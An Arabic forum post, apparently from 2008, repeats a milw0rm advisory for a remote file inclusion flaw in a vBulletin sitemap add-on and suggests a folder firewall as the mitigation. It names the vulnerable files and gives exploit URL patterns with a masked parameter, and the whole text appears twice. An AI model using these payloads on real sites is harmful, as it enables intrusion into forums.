هدوء العاصفة
28 - 10 - 2008, 07:49 PM
كما هو واضح من العنوان ثغرة في هاك نشر المواضيع بجوجل
طبعا أول موقع عربي مصــاب وهو موقع ماجــدة والكثير من المواقع العربية الكبيرة والمشهورة
وبمـا انهـا أضافة برمجية مثل الهــاكات يبقى أحتمال كبير تكون كل الأصدارات مصابة
أسم الأضافة : vBulletin Google Site Map Creator أو أختصار vBulletin vBGSiteMap
الثغرة طرحتهــا في مـواقع السكيرتي
وهي على الشكل التالي :
=============================================
vBulletin Google Site Map Creator (****) Remote File Include Vulnerability
=============================================
Found by : Host4vb.com & Cold z3ro
Contact : *****@host4vb.com , Cold-z3ro@*******.com
Homepage : Host4vb.com , Hack-Teach.Org
=============================================
Script : http://forum.time2dine.co.nz/seo-vbulletin/vbulletin-google-site-map-3976.html
=============================================
File :
/vbgsitemap-vbseo.php <= Line 5
require $****."includes/functions_vbseo.php";
=============================================
File :
/vbgsitemap-config.php <= Line 139
require $****."includes/config.php";
=============================================
Exploit :
vBulletin_Forum_Bath/vbgsitemap/vbgsitemap-config.php?****=Evil-Script?
vBulletin_Forum_Bath/vbgsitemap/vbgsitemap-vbseo.php?****=Evil-Script?
==============================================
Greets To : Xp10.com , Hack-Teach Members , All Arabs Hosting , Sniper-sa.com , sm4host.com
Thanx: Mohandko , Alkomandoz Hacker , Mogatil , The Viper , The Wolf Ksa , Dr.Exe , Pro *******
Thanx: Green eyas amor , Titanichacker , hacaaar , Hack Back , Mohammad Sallah , Unix Hacker
RoMaNcYxHaCkEr , mR wEsAm X , Mr.E-vil
Thanx: Team Hell Members (ConviCt & jEdDaWi & Black ****l & ******* Cool & Dr.killer & Red Hat)
# milw0rm.com [2007-05-25]
طيب والترقيع الوحيد اللي نزل لهذه الثغرة
هو انك تركب جدار ناري في هذا المجلد
كود:
/vbgsitemap/
وطبعا الهاك مهم جدا بالنسه لاصحاب المنتديات
فمن الصعب انهم يحذفوه وعشان كده لازم يعملوا جدار ناري عشان يحموا انفسهم
من هذه الثغرة
طبعا أول موقع عربي مصــاب وهو موقع ماجــدة والكثير من المواقع العربية الكبيرة والمشهورة
وبمـا انهـا أضافة برمجية مثل الهــاكات يبقى أحتمال كبير تكون كل الأصدارات مصابة
أسم الأضافة : vBulletin Google Site Map Creator أو أختصار vBulletin vBGSiteMap
الثغرة طرحتهــا في مـواقع السكيرتي
وهي على الشكل التالي :
=============================================
vBulletin Google Site Map Creator (****) Remote File Include Vulnerability
=============================================
Found by : Host4vb.com & Cold z3ro
Contact : *****@host4vb.com , Cold-z3ro@*******.com
Homepage : Host4vb.com , Hack-Teach.Org
=============================================
Script : http://forum.time2dine.co.nz/seo-vbulletin/vbulletin-google-site-map-3976.html
=============================================
File :
/vbgsitemap-vbseo.php <= Line 5
require $****."includes/functions_vbseo.php";
=============================================
File :
/vbgsitemap-config.php <= Line 139
require $****."includes/config.php";
=============================================
Exploit :
vBulletin_Forum_Bath/vbgsitemap/vbgsitemap-config.php?****=Evil-Script?
vBulletin_Forum_Bath/vbgsitemap/vbgsitemap-vbseo.php?****=Evil-Script?
==============================================
Greets To : Xp10.com , Hack-Teach Members , All Arabs Hosting , Sniper-sa.com , sm4host.com
Thanx: Mohandko , Alkomandoz Hacker , Mogatil , The Viper , The Wolf Ksa , Dr.Exe , Pro *******
Thanx: Green eyas amor , Titanichacker , hacaaar , Hack Back , Mohammad Sallah , Unix Hacker
RoMaNcYxHaCkEr , mR wEsAm X , Mr.E-vil
Thanx: Team Hell Members (ConviCt & jEdDaWi & Black ****l & ******* Cool & Dr.killer & Red Hat)
# milw0rm.com [2007-05-25]
طيب والترقيع الوحيد اللي نزل لهذه الثغرة
هو انك تركب جدار ناري في هذا المجلد
كود:
/vbgsitemap/
وطبعا الهاك مهم جدا بالنسه لاصحاب المنتديات
فمن الصعب انهم يحذفوه وعشان كده لازم يعملوا جدار ناري عشان يحموا انفسهم
من هذه الثغرة